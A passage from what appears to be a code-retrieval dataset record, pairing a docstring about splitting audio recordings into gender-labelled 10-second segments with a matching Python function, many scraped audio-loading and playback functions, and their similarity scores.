dB\r\n spec = librosa.power_to_db(spec, ref=np.min(spec))\r\n\r\n return spec, t, f, x_fs", "def from_file_list(\n cls,\n audio_file_list,\n target_sr=None,\n int_values=False,\n offset=0,\n duration=0,\n trim=False,\n channel_selector=None,\n *args,\n **kwargs,\n ):\n if isinstance(channel_selector, int):\n # Shortcut when selecting a single channel\n if channel_selector >= len(audio_file_list):\n raise RuntimeError(\n f'Channel cannot be selected: channel_selector={channel_selector}, num_audio_files={len(audio_file_list)}'\n )\n # Select only a single file\n audio_file_list = [audio_file_list[channel_selector]]\n # Reset the channel selector since we applied it here\n channel_selector = None\n\n samples = None\n\n for a_file in audio_file_list:\n # Load audio from the current file\n a_segment = cls.from_file(\n a_file,\n target_sr=target_sr,\n int_values=int_values,\n offset=offset,\n duration=duration,\n channel_selector=None,\n trim=False, # Do not apply trim to individual files, it will be applied to the concatenated signal\n *args,\n **kwargs,\n )\n\n # Only single-channel individual files are supported for now\n if a_segment.num_channels != 1:\n raise RuntimeError(\n f'Expecting a single-channel audio signal, but loaded {a_segment.num_channels} channels from file {a_file}'\n )\n\n if target_sr is None:\n # All files need to be loaded with the same sample rate\n target_sr = a_segment.sample_rate\n\n # Concatenate samples\n a_samples = a_segment.samples[:, None]\n\n if samples is None:\n samples = a_samples\n else:\n # Check the dimensions match\n if len(a_samples) != len(samples):\n raise RuntimeError(\n f'Loaded samples need to have identical length: {a_samples.shape} != {samples.shape}'\n )\n\n # Concatenate along channel dimension\n samples = np.concatenate([samples, a_samples], axis=1)\n\n # Final setup for class initialization\n samples = np.squeeze(samples)\n sample_rate = target_sr\n\n return cls(\n samples, sample_rate, target_sr=target_sr, trim=trim, channel_selector=channel_selector, *args, **kwargs,\n )", "def test_load_mp3_file_total_tracks(self):\n track = Track.from_filename(self.track_path('silence-totalnum.mp3'))\n self.assertEqual(track.artist, 'Artist')\n self.assertEqual(track.album, 'Album')\n self.assertEqual(track.title, 'Track')\n self.assertEqual(track.tracknum, 1)\n self.assertEqual(track.seconds, 2.0)", "def record(options):\n signal = audio.record(rate=22050, secs=options.secs,\n store=True, opath=options.opath)\n if options.plot:\n plotter.plot(**{options.opath: signal.data})", "def compute_chunk_features(mp3_file):\n # On convertit le fichier mp3 en un fichier wav mono, 1avec un sample rate de 10000Hertz: on utilise\n # On utilise l'application sox \"c:/Program Files (x86)/sox-14.4.0/sox\"\n\n sox_command = \"./sox-14.4.0/sox\"\n out_file = 'temp.wav'\n #cmd = sox_command % (out_file, mp3_file)\n temp2 = subprocess.call([sox_command, mp3_file,'-r 10000','-c 1',out_file])\n # Read in chunks of data from WAV file\n wav_data1, wav_data2 = read_wav(out_file)\n # We'll cover how the features are computed in the next section!\n return np.array(features(wav_data1)), np.array(features(wav_data2))", "def crop_to_segments(audio, rate, segments):\n crop_start = min(segment.start_frame for segment in segments)\n crop_end = max(segment.end_frame for segment in segments)\n\n for segment in segments:\n segment.start_frame -= crop_start\n segment.end_frame -= crop_start\n\n return audio[crop_start:crop_end], rate, segments", "def read_wav(filename, offset=0, nframes=None, dtype=torch.double):\n\n if nframes is None: # Load whole file\n fs, x = wavfile.read(filename, mmap=False)\n x = torch.tensor(x, dtype=dtype)\n x.unsqueeze_(dim=0)\n\n else: # Load a part\n with wave.open(filename) as f:\n fs = f.getframerate()\n f.setpos(offset)\n buff = f.readframes(nframes)\n x = torch.tensor(np.frombuffer(buff, np.int16), dtype=dtype)\n x.unsqueeze_(dim=0)\n x -= x.mean()\n\n return x.to(DEVICE), fs", "def numpy_from_audio(audio_file, downsample_factor = None):\n sample_rate, samples = wavfile.read(audio_file.replace('\\'',''))\n if downsample_factor is not None:\n samples = signal.resample(samples, len(samples) // downsample_factor)\n sample_rate //= downsample_factor\n drop_samples = -(len(samples) % sample_rate)\n return samples[:drop_samples], sample_rate", "def play_music1(music_file):\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"Music file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! (%s)\" % (music_file, pygame.get_error()))\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def read_wav_data(timestamps, wavfile, snapint=[-0.3, -0.2, -0.1, 0, 0.1, 0.2, 0.3], fft_size=1024):\n sig, samplerate = librosa.load(wavfile, sr=None, mono=True)\n data = list()\n\n # normalize sound wave\n # sig = sig / np.sqrt(np.mean(sig**2, axis=0));\n # sig = sig / np.max(np.max(np.abs(sig), axis=0));\n sig = sig / np.max(np.abs(sig))\n\n # calc a length array\n tmpts = np.array(timestamps)\n timestamp_interval = tmpts[1:] - tmpts[:-1]\n timestamp_interval = np.append(timestamp_interval, timestamp_interval[-1])\n\n for sz in snapint:\n data_r = np.array([get_wav_data_at(max(0, min(len(sig) - fft_size, coord + timestamp_interval[i] * sz)),\n sig, samplerate, fft_size=fft_size, freq_high=samplerate//4) for i, coord in enumerate(timestamps)])\n data.append(data_r)\n\n raw_data = np.array(data)\n norm_data = np.tile(np.expand_dims(\n np.mean(raw_data, axis=1), 1), (1, raw_data.shape[1], 1, 1))\n std_data = np.tile(np.expand_dims(\n np.std(raw_data, axis=1), 1), (1, raw_data.shape[1], 1, 1))\n return (raw_data - norm_data) / std_data", "def strech_audio(file_path, stretch_duration=\"00:10:00\"):\n audio = AudioSegment.from_mp3(file_path)\n # Pull thumbnail\n tags = ID3(file_path)\n thumbnail = tags.get(\"APIC:\").data\n\n # Pull any other tags from og audio file\n tags = mediainfo(file_path).get('TAG', {})\n \n # 1. Get the length of audio in seconds\n original_duration = len(audio)\n\n # 2. How many times does stretch_duration\n # overlap original duration\n stretch_duration = timestamp_to_milliseconds(stretch_duration)\n multiplier = int(stretch_duration/original_duration)\n\n # 3. Stretch the audio\n stretched_audio = audio*multiplier\n \n stretched_audio.export(\n file_path,\n format=\"mp3\",\n tags=tags\n )\n\n audiofile = eyed3.load(file_path)\n audiofile.tag.images.set(3, thumbnail, 'image/jpeg')\n audiofile.tag.save()", "def wav_to_raw(path, log=False):\n rate, data = wavfile.read(path)\n if log:\n m, s = divmod(float(len(data))/rate, 60)\n h, m = divmod(m, 60)\n logging.info(\"Original recording length: %d h %d m %d s\" % (h, m, s))\n try:\n if data.shape[1] == 2:\n # If stereo (2-channel), take the average of the two channels.\n data = 0.5 * (data[:, 0] + data[:, 1])\n if log:\n logging.info('Stereo audio')\n except IndexError:\n if log:\n logging.info('Mono audio')\n return rate, data", "def load_audio(ds, num_prefetch=None):\n if num_prefetch is None:\n num_prefetch = TF_AUTOTUNE\n\n logger.info(\"Reading audio files from the path of each element and appending the read signals and their sample rates to each element. Number of signals to prefetch: %d.\", num_prefetch)\n\n def _append_signals(x):\n signal, sample_rate = audio_features.read_wav(x[\"path\"])\n return dict(x, signal=signal, sample_rate=sample_rate)\n\n return (ds.map(_append_signals, num_parallel_calls=TF_AUTOTUNE)\n .prefetch(num_prefetch))", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n num_silent = 0\n snd_started = False\n\n r = array('h')\n\n while 1:\n # little endian, signed short\n snd_data = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n snd_started = True\n\n if snd_started and num_silent > SILENCE:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n r = trim(r)\n r = add_silence(r, 0.5)\n return sample_width, r", "def load_audio(\n path: Path,\n channel: Optional[int] = None,\n mmap: bool = False,\n channel_names: List[str] = [\"left\", \"right\"],\n) -> MultiTrack:\n multiTrack = MultiTrack()\n assert 0 < len(channel_names) <= 2\n try:\n fs, value = wav_read(path, mmap=mmap)\n except ValueError:\n try:\n import soundfile as sf\n\n value, fs = sf.read(path, dtype=\"int16\")\n except ImportError:\n logging.error(\n f\"Scipy was unable to import {path}, \"\n f\"try installing soundfile python package for more compatability\"\n )\n raise ImportError\n except RuntimeError:\n raise RuntimeError(f\"Unable to import audio file {path}\")\n if value.ndim == 1:\n if channel is not None and channel != 0:\n raise MultiChannelError(\n f\"cannot select channel {channel} from monaural file {path}\"\n )\n multiTrack[channel_names[0]] = Wave(value[:, np.newaxis], fs, path=path)\n if value.ndim == 2:\n\n if channel is None:\n multiTrack[channel_names[0]] = Wave(value[:, 0], fs, path=path)\n multiTrack[channel_names[1]] = Wave(value[:, 1], fs, path=path)\n else:\n try:\n multiTrack[channel_names[channel]] = Wave(\n value[:, channel], fs, path=path\n )\n except IndexError:\n raise MultiChannelError(\n f\"cannot select channel {channel} from file \"\n f\"{path} with {value.shape[1]} channels\"\n )\n\n for k in multiTrack.keys():\n value = multiTrack[k].value\n\n if np.issubdtype(value.dtype, np.integer):\n multiTrack[k].min = np.iinfo(value.dtype).min\n multiTrack[k].max = np.iinfo(value.dtype).max\n elif np.issubdtype(value.dtype, np.floating):\n multiTrack[k].min = -1.0\n multiTrack[k].max = 1.0\n else:\n logging.error(f\"Wave dtype {value.dtype} not supported\")\n raise NotImplementedError\n return multiTrack", "def segment_from_file(\n cls, audio_file, target_sr=None, n_segments=0, trim=False, orig_sr=None, channel_selector=None, offset=None\n ):\n is_segmented = False\n try:\n with sf.SoundFile(audio_file, 'r') as f:\n sample_rate = f.samplerate\n if target_sr is not None:\n n_segments_at_original_sr = math.ceil(n_segments * sample_rate / target_sr)\n else:\n n_segments_at_original_sr = n_segments\n\n if 0 < n_segments_at_original_sr < len(f):\n max_audio_start = len(f) - n_segments_at_original_sr\n if offset is None:\n audio_start = random.randint(0, max_audio_start)\n else:\n audio_start = math.floor(offset * sample_rate)\n if audio_start > max_audio_start:\n raise RuntimeError(\n f'Provided audio start ({audio_start}) is larger than the maximum possible ({max_audio_start})'\n )\n f.seek(audio_start)\n samples = f.read(n_segments_at_original_sr, dtype='float32')\n is_segmented = True\n elif n_segments_at_original_sr > len(f):\n logging.warning(\n f\"Number of segments ({n_segments_at_original_sr}) is greater than the length ({len(f)}) of the audio file {audio_file}. This may lead to shape mismatch errors.\"\n )\n samples = f.read(dtype='float32')\n else:\n samples = f.read(dtype='float32')\n except RuntimeError as e:\n logging.error(f\"Loading {audio_file} via SoundFile raised RuntimeError: `{e}`.\")\n raise e\n\n features = cls(\n samples, sample_rate, target_sr=target_sr, trim=trim, orig_sr=orig_sr, channel_selector=channel_selector\n )\n\n if is_segmented:\n features._samples = features._samples[:n_segments]\n\n return features", "def wavread(filename):\n\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\traise ValueError(\"Input file is wrong\")\n\n\tfs, x = read(filename)\n\n\tif (len(x.shape) !=1): # raise error if more than one channel\n x = np.mean(x,axis = 1)\n\t\tprint \"Audio file is stereo, converting to mono\"\n\n\t#scale down and convert audio into floating point number in range of -1 to 1\n\tx = np.float32(x)/norm_fact[x.dtype.name]\n\treturn fs, x", "def parse_mixer_file(filepath):\n logger = logging.getLogger(parse_mixer_file.__name__)\n mixer = list()\n with open(filepath, 'r') as mixer_file:\n for i,line in enumerate(mixer_file):\n\n line = line.strip()\n\n # A line looks like the following\n # <folder path> <number of trajectories>\n # If the second argument is not present, use all files in the folder indicated by -1\n\n # skip empty lines and lines starting with # are comments\n if len(line) == 0 or line[0] == '#':\n continue\n\n splits= line.split(' ')\n\n if len(splits) == 3:\n path = splits[0].strip()\n num_trajectories = int(splits[1])\n num_samples = int(splits[2])\n elif len(splits) == 2:\n path = splits[0].strip()\n num_trajectories = int(splits[1])\n num_samples = -1\n elif len(splits) == 1:\n path = splits[0].strip()\n num_trajectories = -1\n num_samples = -1\n else:\n raise ValueError('Invalid number of values in line {}: {}'.format(i+1,\n line.strip()))\n\n if num_trajectories < 0:\n logger.info('Take all files from {}'.format(path))\n else:\n logger.info('Take {} files from {}'.format(num_trajectories, path))\n\n mixer.append((path, num_trajectories, num_samples))\n\n if len(mixer) == 0:\n raise ValueError('Mixer file did not contain any valid element')\n\n return mixer", "def read(self, filename, normalize=True):\n if self.gcp == False:\n\n\t\t filepath = self.mixed_dir + filename\n\t\t sf, time_signal = wavfile.read(filepath, mmap=True)\n\n else:\n\n blob = list(self.bucket.list_blobs(prefix=filename))[0]\n # download blob as string\n file_as_string = blob.download_as_string()\n sf, time_signal = wavfile.read(io.BytesIO(file_as_string), mmap=True)\n\n\t\tif normalize == True:\n\t\t\t\n # normalization, assuming 2^15 is the highest possible quantization\n\t\t\ttime_signal = time_signal/np.power(2,15)\n\n\t\treturn time_signal", "def play_audio():\n directory = os.fsencode(MINI_PATH)\n print(directory)\n adp= []\n # lst = os.listdir(directory)\n # lst.sort()\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n #print(file)\n\n if filename.endswith(\".mp3\"): \n adp.append(MINI_PATH+filename)\n #print(adp)\n adp.sort()\n print(\"ADP: \", adp)\n x = \"|\".join(adp)\n print( f'concat:{x}')\n subprocess.call(['ffmpeg', '-i', f'concat:{x}', '-acodec', 'copy', RESULT_PATH])\n \n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n print(filename)\n if filename.endswith(\".mp3\"):\n os.remove(MINI_PATH+filename)", "def __init__(self, audio_fname, good_range=None, **kwargs):\n # Some parameters\n self.sampling_rate = 44100 # This is essentia's default\n self.stroke_length = kwargs.get('stroke_length', 0.5) # In seconds\n self.clip_start = kwargs.get('clip_start', True) # In seconds\n self.clip_end = kwargs.get('clip_end', True) # In seconds\n\n # Getting the audio signal\n self.audio_fname = audio_fname\n # Following is an audio signal sampled in 44100Hz (essentia default)\n self.audio = MonoLoader(filename=audio_fname)()\n\n # Cleaning edges\n try:\n self.audio = self.audio[good_range[0]:good_range[1]]\n except:\n pass\n\n # clipping\n self.audio_thd = 0.05\n self.beginning_buffer = 1 # in seconds\n if self.clip_start:\n clipped_start = np.argmax(self.audio>self.audio_thd) - self.beginning_buffer*self.sampling_rate\n clipped_start = max(0, clipped_start)\n self.audio = self.audio[clipped_start:-1]\n\n if self.clip_end:\n reversed_audio = self.audio[::-1]\n clipped_end = len(reversed_audio) - np.argmax(reversed_audio>self.audio_thd) - 1 + self.beginning_buffer*self.sampling_rate\n self.audio = self.audio[:clipped_end]\n\n # Some parameter that will be defined by signal processing\n self.onset_times = False # In seconds\n self.onset_samples = False # As sample number in the audio sampling\n self.strokes = False\n self.stroke_df = False\n self.feature_table = False", "def compute_chunk_features(mp3_file):\n # Extract MP3 file to a mono, 10kHz WAV file\n sox_command = \"/usr/local/bin/sox\"\n out_file = 'temp.wav'\n #cmd = sox_command % (out_file, mp3_file)\n temp2 = subprocess.call([sox_command, mp3_file,'-r 10000','-c 1',out_file])\n # Read in chunks of data from WAV file\n wav_data1, wav_data2 = read_wav(out_file)\n # We'll cover how the features are computed in the next section!\n return np.array(features(wav_data1)), np.array(features(wav_data2))", "def read_wav(wav_file):\n w = wave.open(wav_file)\n n = 60 * 10000\n if w.getnframes() < n * 2:\n raise ValueError('Wave file too short')\n frames = w.readframes(n)\n wav_data1 = struct.unpack('%dh' % n, frames)\n frames = w.readframes(n)\n wav_data2 = struct.unpack('%dh' % n, frames)\n return wav_data1, wav_data2", "def load_times(file_name):\n data = np.loadtxt(file_name)\n data = data[data[:, 0].argsort()]\n times = data[:, 0]\n values = data[:, 1]\n\n # Remove the mean amplitude and shift time origin\n times -= times[0]\n values -= np.mean(values)\n\n return times, values", "def load_music_files():\n # Make a list of music files, right now it is done by collection all files\n # below the current folder whose extension starts with mp3/wav \n print('Loading music files...')\n for path, dirs, files in os.walk('.'):\n for file_ in files:\n file_path = os.path.relpath(os.path.join(path, file_))\n url_path = os.path.join(*[quote(part) for part in os.path.split(file_path)]) \n ext = os.path.splitext(file_)[1].lower()\n name = os.path.splitext(file_)[0].lower()\n key = ''.join(name.split()) # unique key - no spaces\n audio_file = None\n if ext.startswith('.mp3'):\n audio = MP3(file_path) \n audio_file = AudioFile(url_path, audio.info.length, name, key) \n if audio_file:\n music_files.append(audio_file)\n print('Found:', music_files[-1])", "def read_cospectrum(path,d):\r\n spec = []\r\n timeseries = []\r\n for i in range(len(d)):\r\n filename = path + d[i]\r\n\r\n with open(filename, \"r\") as f:\r\n reader = csv.reader(f,delimiter=',')\r\n ct=1\r\n for row in reader:\r\n if ct==6:\r\n Hz = float(row[0].split('_')[-1])\r\n elif ct==7:\r\n height = float(row[0].split('_')[-1])\r\n elif ct==8:\r\n ws = float(row[0].split('_')[-1])\r\n elif ct==9:\r\n avg_period = float(row[0].split('_')[-1])\r\n elif ct==13:\r\n header = row\r\n elif ct>13:\r\n break\r\n ct+=1\r\n \r\n meta = [Hz,height,ws,avg_period]\r\n \r\n thisspec = np.genfromtxt(filename,delimiter=',',skip_header=13)\r\n spec.append(thisspec)\r\n thistime = re.findall('\\d{8}-\\d{4}',filename)[0]\r\n thisdate = datetime.strptime(thistime,'%Y%m%d-%H%M')\r\n timeseries.append(thisdate) \r\n \r\n return spec, timeseries, header, meta", "def from_file(\n cls,\n audio_file,\n target_sr=None,\n int_values=False,\n offset=0,\n duration=0,\n trim=False,\n trim_ref=np.max,\n trim_top_db=60,\n trim_frame_length=2048,\n trim_hop_length=512,\n orig_sr=None,\n channel_selector=None,\n normalize_db=None,\n ref_channel=None,\n ):\n samples = None\n if isinstance(audio_file, list):\n return cls.from_file_list(\n audio_file_list=audio_file,\n target_sr=target_sr,\n int_values=int_values,\n offset=offset,\n duration=duration,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )\n\n if not isinstance(audio_file, str) or os.path.splitext(audio_file)[-1] in sf_supported_formats:\n try:\n with sf.SoundFile(audio_file, 'r') as f:\n dtype = 'int32' if int_values else 'float32'\n sample_rate = f.samplerate\n if offset > 0:\n f.seek(int(offset * sample_rate))\n if duration > 0:\n samples = f.read(int(duration * sample_rate), dtype=dtype)\n else:\n samples = f.read(dtype=dtype)\n except RuntimeError as e:\n logging.error(\n f\"Loading {audio_file} via SoundFile raised RuntimeError: `{e}`. \"\n f\"NeMo will fallback to loading via pydub.\"\n )\n\n if hasattr(audio_file, \"seek\"):\n audio_file.seek(0)\n\n if HAVE_PYDUB and samples is None:\n try:\n samples = Audio.from_file(audio_file)\n sample_rate = samples.frame_rate\n num_channels = samples.channels\n if offset > 0:\n # pydub does things in milliseconds\n seconds = offset * 1000\n samples = samples[int(seconds) :]\n if duration > 0:\n seconds = duration * 1000\n samples = samples[: int(seconds)]\n samples = np.array(samples.get_array_of_samples())\n # For multi-channel signals, channels are stacked in a one-dimensional vector\n if num_channels > 1:\n samples = np.reshape(samples, (-1, num_channels))\n except CouldntDecodeError as err:\n logging.error(f\"Loading {audio_file} via pydub raised CouldntDecodeError: `{err}`.\")\n\n if samples is None:\n libs = \"soundfile, and pydub\" if HAVE_PYDUB else \"soundfile\"\n raise Exception(f\"Your audio file {audio_file} could not be decoded. We tried using {libs}.\")\n\n return cls(\n samples,\n sample_rate,\n target_sr=target_sr,\n trim=trim,\n trim_ref=trim_ref,\n trim_top_db=trim_top_db,\n trim_frame_length=trim_frame_length,\n trim_hop_length=trim_hop_length,\n orig_sr=orig_sr,\n channel_selector=channel_selector,\n normalize_db=normalize_db,\n ref_channel=ref_channel,\n )", "def on_media_loaded(self, event):\r\n if hasattr(self.mediactrl, \"DONTPLAY\"):\r\n delattr(self.mediactrl, \"DONTPLAY\")\r\n else:\r\n self.mediactrl.Play()\r\n data = self.data[self.text_id]\r\n index = data[\"filenames\"].index(data[\"current\"])\r\n self.gauge.SetValue(100.0 * (index + 1) / data[\"count\"])", "def play(sampler, name=\"/Users/Jxie0755/Documents/DXcodings/Learning_Python/CS_61A/week03/mario.wav\", seconds=2):\n out = open(name, \"wb\")\n out.setnchannels(1)\n out.setsampwidth(2)\n out.setframerate(frame_rate)\n t = 0\n while t < seconds * frame_rate:\n sample = sampler(t)\n out.writeframes(encode(sample))\n t = t + 1\n out.close()", "def load_tracks(self, data_dir, file_suffix):\n file_names = [x for x in self._list_data_files(data_dir, file_suffix)]\n print(f\"{file_suffix.upper()} files: {len(file_names)}\")\n\n tracks = []\n\n loaded_tracks = self._load_data_tracks(\n file_names, self.load_func_dict.get(file_suffix, load_gpx_file)\n )\n\n tracks.extend(loaded_tracks.values())\n log.info(f\"Conventionally loaded tracks: {len(loaded_tracks)}\")\n\n tracks = self._filter_tracks(tracks)\n\n # merge tracks that took place within one hour\n tracks = self._merge_tracks(tracks)\n # filter out tracks with length < min_length\n return [t for t in tracks if t.length >= self.min_length]" ]
[ "0.64271533", "0.6278708", "0.6274508", "0.6185571", "0.60926473", "0.6001208", "0.59411097", "0.59162825", "0.59099066", "0.5908874", "0.58851975", "0.58825463", "0.58139896", "0.5805803", "0.5801357", "0.57745636", "0.57619977", "0.5760922", "0.5745996", "0.56929225", "0.5692219", "0.56778324", "0.5647526", "0.56439734", "0.56117195", "0.56079024", "0.560788", "0.5599134", "0.55916727", "0.559097", "0.55789536", "0.5559803", "0.5558456", "0.5543562", "0.5533692", "0.5515577", "0.5490019", "0.5484649", "0.54649717", "0.54591066", "0.54588616", "0.54323167", "0.54288137", "0.5422587", "0.54215425", "0.5420751", "0.540456", "0.540219", "0.53962207", "0.5377127", "0.5376444", "0.5340699", "0.5335268", "0.53240365", "0.53170335", "0.5311564", "0.53107584", "0.53018224", "0.5295385", "0.52877766", "0.5285009", "0.52838016", "0.5282398", "0.52768", "0.5269239", "0.526842", "0.526669", "0.52657", "0.52647954", "0.5259704", "0.5258433", "0.5240021", "0.5235511", "0.5223285", "0.52225804", "0.522224", "0.5218797", "0.5217136", "0.5207983", "0.5207963", "0.52007574", "0.51864564", "0.5183331", "0.5179131", "0.5175417", "0.51732534", "0.5171615", "0.5171432", "0.51579154", "0.5157564", "0.51553404", "0.51533157", "0.5147174", "0.5144434", "0.5130418", "0.51296836", "0.512903", "0.51286095", "0.51157725", "0.511356" ]
0.62473094
3
Load an audio file and segment into 10s increments Save each segment to the target directory. Append the gender of the speaker and the segment index to the filename.
def segment_audio(filename, y_value, split='train', clf='gender'): filepath = 'recordings/recordings/' + filename + '.mp3' audio, sr = librosa.load(filepath, sr=16000) audio = normalize(audio) # Add gender label to filename for later processing sex = y_value if sex == 'female': filename = '{}.F'.format(filename) else: filename = '{}.M'.format(filename) # Segment audio file seg_files = segment_10s(audio, sr) for key, val in seg_files.items(): new_name = '{}.{}'.format(filename, key) sf.write('data/{}/{}/{}o.wav'.format(clf, split, new_name), val, sr)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def file_generator(files: list,\n segment_duration: float,\n sampleRate: int,\n db_thr: float or None = None,\n frame_length: int = 512,\n hop_length: int = 128,\n ) -> None:\n\n I = 0\n J = 0\n\n segment = np.zeros((int(segment_duration*sampleRate),))\n\n k = 0\n file_no = 0\n\n while True:\n if I >= len(segment):\n yield segment\n segment = np.zeros((int(segment_duration*sampleRate),))\n I = 0\n\n if k == 0 or J >= len(y):\n J = 0\n y, sr = librosa.core.load(files[file_no], mono=True, sr=sampleRate)\n file_no += 1\n\n if file_no == len(files):\n break\n\n # Normalize\n y = y/y.max()\n\n # Remix non-silent segments\n if db_thr is not None:\n # Figure out intervals of non-silence (NOTE: Is the threshold right? -- 60db quiet)\n intervals = librosa.effects.split(y, frame_length=frame_length, hop_length=hop_length, top_db=db_thr)\n\n # Remix according to those intervals\n y = librosa.effects.remix(y, intervals)\n\n if len(segment[I:]) >= len(y[J:]):\n segment[I:I+len(y[J:])] = y[J:]\n I = I + len(y[J:])\n J = J + len(y[J:])\n else:\n segment[I:] = y[J:J+len(segment[I:])]\n J = J + len(segment[I:])\n I = I + len(segment[I:])\n k += 1", "def process(filename, debug_mode=False):\n if debug_mode:\n global DO_REPORT\n DO_REPORT = debug_mode\n\n try:\n signal = preprocessing(filename)\n except BaseException as e:\n print(e)\n sys.exit()\n\n labels, num_of_speakers = diarization(signal)\n segments = lab2seg(labels)\n res_filename = create_csv(filename, segments)\n return res_filename, num_of_speakers", "def read_audio(audio_paths, speaker_dict, tool, config, normalize, is_training,\n save_path=None, save_format='numpy',\n global_mean_male=None, global_mean_female=None,\n global_std_male=None, global_std_female=None,\n dtype=np.float32):\n if not is_training:\n if global_mean_male is None or global_mean_female is None:\n raise ValueError('Set mean & std computed in the training set.')\n if normalize not in ['global', 'speaker', 'utterance', 'no']:\n raise ValueError(\n 'normalize must be \"utterance\" or \"speaker\" or \"global\" or \"no\".')\n if tool not in ['htk', 'python_speech_features', 'librosa']:\n raise TypeError(\n 'tool must be \"htk\" or \"python_speech_features\"' +\n ' or \"librosa\".')\n\n audio_path_list_male, audio_path_list_female = [], []\n total_frame_num_male, total_frame_num_female = 0, 0\n total_frame_num_dict = {}\n speaker_mean_dict = {}\n\n # NOTE: 講演ごとに異なるspeakerとみなす\n\n # Loop 1: Computing global mean and statistics\n if is_training and normalize != 'no':\n print('=====> Reading audio files...')\n for i, audio_path in enumerate(tqdm(audio_paths)):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio file into utterances\n _, input_utt_sum, speaker_mean, _, total_frame_num_speaker = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n if i == 0:\n # Initialize global statistics\n feature_dim = input_utt_sum.shape[0]\n global_mean_male = np.zeros((feature_dim,), dtype=dtype)\n global_mean_female = np.zeros(\n (feature_dim,), dtype=dtype)\n global_std_male = np.zeros((feature_dim,), dtype=dtype)\n global_std_female = np.zeros((feature_dim,), dtype=dtype)\n\n # For computing global mean\n if speaker[3] == 'M':\n audio_path_list_male.append(audio_path)\n global_mean_male += input_utt_sum\n total_frame_num_male += total_frame_num_speaker\n elif speaker[3] == 'F':\n audio_path_list_female.append(audio_path)\n global_mean_female += input_utt_sum\n total_frame_num_female += total_frame_num_speaker\n else:\n raise ValueError\n\n # For computing speaker stddev\n if normalize == 'speaker':\n speaker_mean_dict[speaker] = speaker_mean\n total_frame_num_dict[speaker] = total_frame_num_speaker\n # NOTE: speaker mean is already computed\n\n print('=====> Computing global mean & stddev...')\n # Compute global mean per gender\n global_mean_male /= total_frame_num_male\n global_mean_female /= total_frame_num_female\n\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, _, _, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n # For computing global stddev\n if speaker[3] == 'M':\n for input_utt in input_data_dict_speaker.values():\n global_std_male += np.sum(\n np.abs(input_utt - global_mean_male) ** 2, axis=0)\n elif speaker[3] == 'F':\n for input_utt in input_data_dict_speaker.values():\n global_std_female += np.sum(\n np.abs(input_utt - global_mean_female) ** 2, axis=0)\n else:\n raise ValueError\n\n # Compute global stddev per gender\n global_std_male = np.sqrt(\n global_std_male / (total_frame_num_male - 1))\n global_std_female = np.sqrt(\n global_std_female / (total_frame_num_female - 1))\n\n if save_path is not None:\n # Save global mean & std per gender\n np.save(join(save_path, 'global_mean_male.npy'),\n global_mean_male)\n np.save(join(save_path, 'global_mean_female.npy'),\n global_mean_female)\n np.save(join(save_path, 'global_std_male.npy'),\n global_std_male)\n np.save(join(save_path, 'global_std_female.npy'),\n global_std_female)\n\n # Loop 2: Normalization and Saving\n print('=====> Normalization...')\n frame_num_dict = {}\n sampPeriod, parmKind = None, None\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n if normalize == 'speaker' and is_training:\n speaker_mean = speaker_mean_dict[speaker]\n else:\n speaker_mean = None\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, speaker_mean, speaker_std, _ = segment(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=is_training,\n sil_duration=0,\n tool=tool,\n config=config,\n mean=speaker_mean) # for compute speaker sttdev\n # NOTE: input_data_dict_speaker have been not normalized yet\n\n for utt_index, input_utt in input_data_dict_speaker.items():\n\n if normalize == 'no':\n pass\n elif normalize == 'global' or not is_training:\n # Normalize by mean & std over the training set per gender\n if speaker[3] == 'M':\n input_utt -= global_mean_male\n input_utt /= global_std_male\n elif speaker[3] == 'F':\n input_utt -= global_mean_female\n input_utt /= global_std_female\n else:\n raise ValueError\n elif normalize == 'speaker':\n # Normalize by mean & std per speaker\n input_utt = (input_utt - speaker_mean) / speaker_std\n elif normalize == 'utterance':\n # Normalize by mean & std per utterance\n utt_mean = np.mean(input_utt, axis=0, dtype=dtype)\n utt_std = np.std(input_utt, axis=0, dtype=dtype)\n input_utt = (input_utt - utt_mean) / utt_std\n else:\n raise ValueError\n\n frame_num_dict[speaker + '_' + utt_index] = input_utt.shape[0]\n\n if save_path is not None:\n # Save input features\n if save_format == 'numpy':\n input_data_save_path = mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.npy')\n np.save(input_data_save_path, input_utt)\n elif save_format == 'htk':\n if sampPeriod is None:\n _, sampPeriod, parmKind = read(audio_path)\n write(input_utt,\n htk_path=mkdir_join(\n save_path, speaker, speaker + '_' + utt_index + '.htk'),\n sampPeriod=sampPeriod,\n parmKind=parmKind)\n else:\n raise ValueError('save_format is numpy or htk.')\n\n if save_path is not None:\n # Save the frame number dictionary\n with open(join(save_path, 'frame_num.pickle'), 'wb') as f:\n pickle.dump(frame_num_dict, f)\n\n return (global_mean_male, 